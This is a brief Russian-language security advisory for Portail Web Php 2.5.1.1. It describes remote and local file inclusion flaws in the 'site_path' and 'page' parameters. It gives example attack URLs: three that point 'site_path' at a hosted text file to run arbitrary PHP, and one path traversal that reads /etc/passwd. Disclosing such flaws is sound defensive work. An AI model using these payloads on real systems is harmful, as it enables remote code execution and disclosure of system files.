Программа: Portail Web Php 2.5.1.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «site_path» сценарием index.php и в параметре «page». Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

I- Remote File Inclusion

/PwP2.5.1.1/template/Vert/index.php?site_path=http://localhost/020.txt
/PwP2.5.1.1/template/Noir/index.php?site_path=http://localhost/020.txt
/PwP2.5.1.1/template/Bleu/index.php?site_path=http://localhost/020.txt

II- Local File Inclusion

/PwP2.5.1.1/?page=../../../../../../../../etc/passwd



Оставить мнение